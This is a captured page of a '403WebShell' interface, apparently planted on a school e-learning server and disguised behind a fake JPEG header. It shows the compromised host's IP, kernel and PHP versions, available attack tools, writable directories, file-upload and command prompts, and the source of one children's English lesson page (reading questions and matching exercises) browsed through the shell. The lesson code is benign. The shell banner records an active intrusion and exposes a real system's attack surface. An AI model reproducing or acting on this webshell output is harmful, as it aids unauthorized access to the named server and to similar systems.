????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.135.224.139
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old7/Html/LevelE/Category1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old7/Html/LevelE/Category1/LevelECat1Lesson45.html
<!doctype html>
<html>
    <head>
        <title>Opposites, questions and answers and matchings</title>
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
        <script>
            
            function page_preLoad()
            {                
                shared_setDeviceTypeLevelCategoryLastLesson(Level.E, Category.No1);
                shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                
                shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.E, Category.No1, 45), true, true);
                shared_setFooterTable('id_tblFooter', true, true, true, true, true);
                
                var ids_headings = ['id_heading1'];
                var ids_boxes_withoutDrag = ['id_dropbox_NearZooInSeacoastRoad', 'id_dropbox_suitcase', 'id_dropbox_onTheElbow', 'id_dropbox_tulipFlower', 'id_dropbox_moonsGrandFathersCoat', 'id_dropbox_mushroomSoupAndFreshFruitJuice'];
                var ids_boxes_withDrag = ['id_dropbox_textMoon', 'id_dropbox_textRuby', 'id_dropbox_textFather', 'id_dropbox_textMother'];
                
                var ids_texts = new Array();
                
                for (var textId = 5; textId <= 36; textId++)
                {
                    ids_texts.push('id_td_text' + textId);
                }
                
                var ids_textBoxes = new Array();
                
                for (var textBoxId = 1; textBoxId <= 6; textBoxId++)
                {
                    var idTextBox = 'id_textBox' + textBoxId;
                    var eTextBox = document.getElementById(idTextBox);
                    eTextBox.value = '';
                    
                    if (shared_currentDeviceType == shared_DeviceTypeAndroid)
                    {
                        eTextBox.style.border = 'solid 2px black';
                    }
                    
                    ids_textBoxes.push(idTextBox);
                }
                
                var ids_tds = ['id_tdOptions', 'id_td_textSuitcase', 'id_td_textOnTheElbow', 'id_td_textMushroomSoupAndFreshFruitJuice', 'id_td_textTulipFlower', 'id_td_textNearZooInSeacoastRoad', 'id_td_textMoonsGrandFathersCoat', 'id_td_textMowingTheLawn', 'id_td_textToastingTheBread', 'id_td_textCleaningTheWardrobe', 'id_td_textSortingTheNewspapers'];
                var ids_spans = ['id_span_textSuitcase', 'id_span_textOnTheElbow', 'id_span_textTulipFlower', 'id_span_textMushroomSoupAndFreshFruitJuice', 'id_span_textNearZooInSeacoastRoad', 'id_span_textMoonsGrandFathersCoat', 'id_span_textMowingTheLawn', 'id_span_textToastingTheBread', 'id_span_textCleaningTheWardrobe', 'id_span_textSortingTheNewspapers'];
                
                var ids_All = ids_tds.concat(ids_texts, ids_boxes_withoutDrag, ids_boxes_withDrag, ids_headings, ids_textBoxes);
                
                shared_adjust_fontSize_for_ids_all_devices(ids_All, 60);
                
                shared_init_dropBox_tds_withOUT_drag_here(ids_boxes_withoutDrag);
                shared_init_dropBox_tds_with_drag_here(ids_boxes_withDrag);
                shared_init_dropping_spans(ids_spans);

                var id_tables_array = ['id_table1', 'id_table2'];
                shared_border_collapse_for_tables_except_android(id_tables_array);
            }
        
            function page_onLoad()
            {

            }
        
            function btnHome_click()
            {
                shared_btnHomeCategories_click('LevelE');
            }
        
            function btnPrevious_click()
            {
                window.location = 'LevelECat1Lesson44.html';
            }
            
            function btnNext_click()
            {
                window.location = 'LevelECat1Lesson46.html';
            }

            function DragDrop(id_dropBox, ids_array)
            {
                if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
                {
                    shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox);
                    
                    shared_set_currentDropingId_draggbleToFalse();
                }
                else
                {
                    shared_resetCurrentDroppingPosition(id_dropBox);
                }
            }
        
            function btnValidate_click()
            {
                var ids_boxes = ['id_dropbox_textMoon', 'id_dropbox_textRuby', 'id_dropbox_textFather', 'id_dropbox_textMother'];
                
                var isAllBoxesFilled = shared_isAllInfosFilled(ids_boxes);
                
                var eTextBox1 = document.getElementById('id_textBox1');
                var eTextBox2 = document.getElementById('id_textBox2');
                var eTextBox3 = document.getElementById('id_textBox3');
                var eTextBox4 = document.getElementById('id_textBox4');
                var eTextBox5 = document.getElementById('id_textBox5');
                var eTextBox6 = document.getElementById('id_textBox6');
                
                if ((isAllBoxesFilled) &&
                    (eTextBox1.value != '') &&
                    (eTextBox2.value != '') &&
                    (eTextBox3.value != '') &&
                    (eTextBox4.value != '') &&
                    (eTextBox5.value != '') &&
                    (eTextBox6.value != ''))
                    {
                        shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
                    }
            }
        </script>

    </head>
    <body onload="page_onLoad()">
        
        <div id="shared_id_div_claps_image">
        </div>
        
        <table id="id_tblMainiPadBody" border="1px" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="0" cellpadding="2%" cellspacing="0">
                        <tr height="70%">
                            <td style="padding-bottom:0px">
                                <table id="id_table1" width="100%" height="100%" border="1" cellpadding="0" cellspacing="0">
                                    <tr height="6%">
                                        <td id="id_td_text5" class="shared_style_black_24px_bold_padding_left_2_percent">Answer the following:</td>
                                    </tr>
                                    <tr height="*">
                                        <td>
                                            <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                <tr id="id_tr_dropbox_NearZooInSeacoastRoad" height="16.6%"
                                                    ondragover="shared_highlight('id_dropbox_NearZooInSeacoastRoad'); shared_allowDrop_web(event)"
                                                    ondragleave="shared_un_highlight('id_dropbox_NearZooInSeacoastRoad')"
                                                    ondrop="DragDrop('id_dropbox_NearZooInSeacoastRoad', ['id_span_textNearZooInSeacoastRoad'])">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                            <tr height="50%">
                                                                <td id="id_td_text8" class="shared_style_black_24px_bold" width="10%" align="right">1.</td>
                                                                <td width="2%"></td>
                                                                <td id="id_td_text9" class="shared_style_black_24px_bold" width="*" align="left">Where does Moon's family live?</td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td id="id_td_text10" class="shared_style_blue_24px_bold" align="right">A.</td>
                                                                <td width="2%"></td>
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td id="id_dropbox_NearZooInSeacoastRoad" class="shared_style_red_24px_bold" width="95%" align="left">
                                                                                <textarea id="id_textBox1" class="shared_style_blue_24px_bold" style="width:95%; text-align:left; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
                                                                            <td id="id_td_text11" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr id="id_tr_dropbox_suitcase" height="16.6%"
                                                    ondragover="shared_highlight('id_dropbox_suitcase'); shared_allowDrop_web(event)"
                                                    ondragleave="shared_un_highlight('id_dropbox_suitcase')"
                                                    ondrop="DragDrop('id_dropbox_suitcase', ['id_span_textSuitcase'])">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                            <tr height="50%">
                                                                <td id="id_td_text12" class="shared_style_black_24px_bold" width="10%" align="right">2.</td>
                                                                <td width="2%"></td>
                                                                <td id="id_td_text13" class="shared_style_black_24px_bold" width="*" align="left">Where did Moon find the coat?</td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td id="id_td_text14" class="shared_style_blue_24px_bold" align="right">A.</td>
                                                                <td width="2%"></td>
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td id="id_dropbox_suitcase" class="shared_style_red_24px_bold" width="95%" align="left">
                                                                                <textarea id="id_textBox2" class="shared_style_blue_24px_bold" style="width:95%; text-align:left; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
                                                                            <td id="id_td_text15" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr id="id_tr_dropbox_onTheElbow" height="16.6%"
                                                    ondragover="shared_highlight('id_dropbox_onTheElbow'); shared_allowDrop_web(event)"
                                                    ondragleave="shared_un_highlight('id_dropbox_onTheElbow')"
                                                    ondrop="DragDrop('id_dropbox_onTheElbow', ['id_span_textOnTheElbow'])">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                            <tr height="50%">
                                                                <td id="id_td_text16" class="shared_style_black_24px_bold" width="10%" align="right">3.</td>
                                                                <td width="2%"></td>
                                                                <td id="id_td_text17" class="shared_style_black_24px_bold" width="*" align="left">Where is the hole on the coat?</td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td id="id_td_text18" class="shared_style_blue_24px_bold" align="right">A.</td>
                                                                <td width="2%"></td>
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td id="id_dropbox_onTheElbow" class="shared_style_red_24px_bold" width="95%" align="left">
                                                                                <textarea id="id_textBox3" class="shared_style_blue_24px_bold" style="width:95%; text-align:left; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
                                                                            <td id="id_td_text19" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr id="id_tr_dropbox_tulipFlower" height="16.6%"
                                                    ondragover="shared_highlight('id_dropbox_tulipFlower'); shared_allowDrop_web(event)"
                                                    ondragleave="shared_un_highlight('id_dropbox_tulipFlower')"
                                                    ondrop="DragDrop('id_dropbox_tulipFlower', ['id_span_textTulipFlower'])">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                            <tr height="50%">
                                                                <td id="id_td_text20" class="shared_style_black_24px_bold" width="10%" align="right">4.</td>
                                                                <td width="2%"></td>
                                                                <td id="id_td_text21" class="shared_style_black_24px_bold" width="*" align="left">How is the bow looking like?</td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td id="id_td_text22" class="shared_style_blue_24px_bold" align="right">A.</td>
                                                                <td width="2%"></td>
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td id="id_dropbox_tulipFlower" class="shared_style_red_24px_bold" width="95%" align="left">
                                                                                <textarea id="id_textBox4" class="shared_style_blue_24px_bold" style="width:95%; text-align:left; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
                                                                            <td id="id_td_text23" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr id="id_tr_dropbox_moonsGrandFathersCoat" height="16.6%"
                                                    ondragover="shared_highlight('id_dropbox_moonsGrandFathersCoat'); shared_allowDrop_web(event)"
                                                    ondragleave="shared_un_highlight('id_dropbox_moonsGrandFathersCoat')"
                                                    ondrop="DragDrop('id_dropbox_moonsGrandFathersCoat', ['id_span_textMoonsGrandFathersCoat'])">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                            <tr height="50%">
                                                                <td id="id_td_text24" class="shared_style_black_24px_bold" width="10%" align="right">5.</td>
                                                                <td width="2%"></td>
                                                                <td id="id_td_text25" class="shared_style_black_24px_bold" width="*" align="left">Whose coat is that?</td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td id="id_td_text26" class="shared_style_blue_24px_bold" align="right">A.</td>
                                                                <td width="2%"></td>
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td id="id_dropbox_moonsGrandFathersCoat" class="shared_style_red_24px_bold" width="95%" align="left">
                                                                                <textarea id="id_textBox5" class="shared_style_blue_24px_bold" style="width:95%; text-align:left; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
                                                                            <td id="id_td_text27" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr id="id_tr_dropbox_mushroomSoupAndFreshFruitJuice" height="*"
                                                    ondragover="shared_highlight('id_dropbox_mushroomSoupAndFreshFruitJuice'); shared_allowDrop_web(event)"
                                                    ondragleave="shared_un_highlight('id_dropbox_mushroomSoupAndFreshFruitJuice')"
                                                    ondrop="DragDrop('id_dropbox_mushroomSoupAndFreshFruitJuice', ['id_span_textMushroomSoupAndFreshFruitJuice'])">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                            <tr height="50%">
                                                                <td id="id_td_text28" class="shared_style_black_24px_bold" width="10%" align="right">6.</td>
                                                                <td width="2%"></td>
                                                                <td id="id_td_text29" class="shared_style_black_24px_bold" width="*" align="left">What did the mother cook for girls?</td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td id="id_td_text30" class="shared_style_blue_24px_bold" align="right">A.</td>
                                                                <td width="2%"></td>
                                                                <td>
                                                                    <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                                        <tr>
                                                                            <td id="id_dropbox_mushroomSoupAndFreshFruitJuice" class="shared_style_red_24px_bold" width="95%" align="left">
                                                                                <textarea id="id_textBox6" class="shared_style_blue_24px_bold" style="width:95%; text-align:left; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
                                                                            <td id="id_td_text31" width="*">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="12%">
                                        <td>
                                            <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                <tr height="33%">
                                                    <td id="id_tdOptions" width="*" class="shared_style_blue_24px_bold_padding_left_2_percent">Clues:</td>
                                                    <td id="id_td_textSuitcase" class="shared_style_red_24px_bold" width="40%" align="center">
                                                        <span id="id_span_textSuitcase">Suitcase</span>
                                                    </td>
                                                    <td id="id_td_textOnTheElbow" class="shared_style_red_24px_bold"width="45%" align="center">
                                                        <span id="id_span_textOnTheElbow">On the elbow</span>
                                                    </td>
                                                </tr>
                                                <tr height="33%">
                                                    <td id="id_td_text6" width="*">&nbsp;</td>
                                                    <td id="id_td_textTulipFlower" class="shared_style_red_24px_bold" width="40%" align="center">
                                                        <span id="id_span_textTulipFlower">Tulip flower</span>
                                                    </td>
                                                    <td id="id_td_textMushroomSoupAndFreshFruitJuice" class="shared_style_red_24px_bold" width="45%" align="center">
                                                        <span id="id_span_textMushroomSoupAndFreshFruitJuice">Mushroom soup and fruit juice</span>
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td id="id_td_text7" width="*">&nbsp;</td>
                                                    <td id="id_td_textNearZooInSeacoastRoad" class="shared_style_red_24px_bold"width="40%" align="center">
                                                        <span id="id_span_textNearZooInSeacoastRoad">Near zoo in seacoast road</span>
                                                    </td>
                                                    <td id="id_td_textMoonsGrandFathersCoat" class="shared_style_red_24px_bold" width="45%" align="center">
                                                        <span id="id_span_textMoonsGrandFathersCoat">Moon's grand father's coat</span>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                        <tr height="*">
                            <td>
                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                    <tr>
                                        <td>
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                <tr height="15%">
                                                    <td>
                                                        <table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_heading1" class="shared_style_black_24px_bold_padding_left_2_percent" style="border-bottom:none">Match the following:</td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td>
                                                        <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                            <tr height="5%">
                                                                <td width="60%" style="border-right:none; border-top:none">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                        <tr>
                                                                            <td width="*">
                                                                                <table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0">
                                                                                    <tr id="id_tr_dropbox_textMoon" height="25%"
                                                                                        ondragover="shared_highlight('id_dropbox_textMoon'); shared_allowDrop_web(event)"
                                                                                        ondragleave="shared_un_highlight('id_dropbox_textMoon')"
                                                                                        ondrop="DragDrop('id_dropbox_textMoon', ['id_span_textCleaningTheWardrobe'])">
                                                                                        <td id="id_td_text32" class="shared_style_black_24px_bold_padding_left_2_percent" width="35%" align="left" style="padding-left:12%">Moon</td>
                                                                                        <td id="id_dropbox_textMoon" class="shared_style_red_24px_bold" width="*" align="center">_______</td>
                                                                                    </tr>
                                                                                    <tr id="id_tr_dropbox_textRuby" height="25%"
                                                                                        ondragover="shared_highlight('id_dropbox_textRuby'); shared_allowDrop_web(event)"
                                                                                        ondragleave="shared_un_highlight('id_dropbox_textRuby')"
                                                                                        ondrop="DragDrop('id_dropbox_textRuby', ['id_span_textSortingTheNewspapers'])">
                                                                                        <td id="id_td_text33" class="shared_style_black_24px_bold_padding_left_2_percent" width="35%" align="left" style="padding-left:12%">Ruby</td>
                                                                                        <td id="id_dropbox_textRuby" class="shared_style_red_24px_bold" width="*" align="center">_______</td>
                                                                                    </tr>
                                                                                    <tr id="id_tr_dropbox_textFather" height="25%"
                                                                                        ondragover="shared_highlight('id_dropbox_textFather'); shared_allowDrop_web(event)"
                                                                                        ondragleave="shared_un_highlight('id_dropbox_textFather')"
                                                                                        ondrop="DragDrop('id_dropbox_textFather', ['id_span_textMowingTheLawn'])">
                                                                                        <td id="id_td_text34" class="shared_style_black_24px_bold_padding_left_2_percent" width="35%" align="left" style="padding-left:12%">Father</td>
                                                                                        <td id="id_dropbox_textFather" class="shared_style_red_24px_bold" width="*" align="center">_______</td>
                                                                                    </tr>
                                                                                    <tr id="id_tr_dropbox_textMother" height="*"
                                                                                        ondragover="shared_highlight('id_dropbox_textMother'); shared_allowDrop_web(event)"
                                                                                        ondragleave="shared_un_highlight('id_dropbox_textMother')"
                                                                                        ondrop="DragDrop('id_dropbox_textMother', ['id_span_textToastingTheBread'])">
                                                                                        <td id="id_td_text35" class="shared_style_black_24px_bold_padding_left_2_percent" width="35%" align="left" style="padding-left:12%">Mother</td>
                                                                                        <td id="id_dropbox_textMother" class="shared_style_red_24px_bold" width="*" align="center">_______</td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                            <td id="id_td_text36" width="2%">&nbsp;</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                                <td width="*" style="border-top:none">
                                                                    <table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0">
                                                                        <tr height="25%">
                                                                            <td id="id_td_textMowingTheLawn" class="shared_style_black_24px_bold" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_textMowingTheLawn">mowing the lawn</span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="25%">
                                                                            <td id="id_td_textToastingTheBread" class="shared_style_black_24px_bold" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_textToastingTheBread">toasting the bread</span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="25%">
                                                                            <td id="id_td_textCleaningTheWardrobe" class="shared_style_black_24px_bold" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_textCleaningTheWardrobe">cleaning the wardrobe</span>
                                                                            </td>
                                                                        </tr>
                                                                        <tr height="*">
                                                                            <td id="id_td_textSortingTheNewspapers" class="shared_style_black_24px_bold" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                <span id="id_span_textSortingTheNewspapers">sorting the newspapers</span>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>
        </table>
        <script>
            page_preLoad();
            
            new webkit_draggable('id_span_textMowingTheLawn', {handle : 'id_td_textMowingTheLawn', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textToastingTheBread', {handle : 'id_td_textToastingTheBread', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textCleaningTheWardrobe', {handle : 'id_td_textCleaningTheWardrobe', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textSortingTheNewspapers', {handle : 'id_td_textSortingTheNewspapers', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            
            webkit_drop.add('id_tr_dropbox_textMoon', {onOver : function(){shared_highlight('id_dropbox_textMoon')}, onOut : function(){shared_un_highlight('id_dropbox_textMoon')}, onDrop : function(){DragDrop('id_dropbox_textMoon', ['id_span_textCleaningTheWardrobe'])}});
            webkit_drop.add('id_tr_dropbox_textRuby', {onOver : function(){shared_highlight('id_dropbox_textRuby')}, onOut : function(){shared_un_highlight('id_dropbox_textRuby')}, onDrop : function(){DragDrop('id_dropbox_textRuby', ['id_span_textSortingTheNewspapers'])}});
            webkit_drop.add('id_tr_dropbox_textFather', {onOver : function(){shared_highlight('id_dropbox_textFather')}, onOut : function(){shared_un_highlight('id_dropbox_textFather')}, onDrop : function(){DragDrop('id_dropbox_textFather', ['id_span_textMowingTheLawn'])}});
            webkit_drop.add('id_tr_dropbox_textMother', {onOver : function(){shared_highlight('id_dropbox_textMother')}, onOut : function(){shared_un_highlight('id_dropbox_textMother')}, onDrop : function(){DragDrop('id_dropbox_textMother', ['id_span_textToastingTheBread'])}});
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit